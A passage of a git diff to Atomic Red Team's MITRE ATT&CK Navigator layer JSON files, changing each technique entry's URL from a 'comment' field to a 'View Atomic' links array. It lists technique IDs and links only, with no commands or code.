Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index 6d914ff8..964bc447 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index b7eb3cf9..0a8439f4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1041","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1091","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniq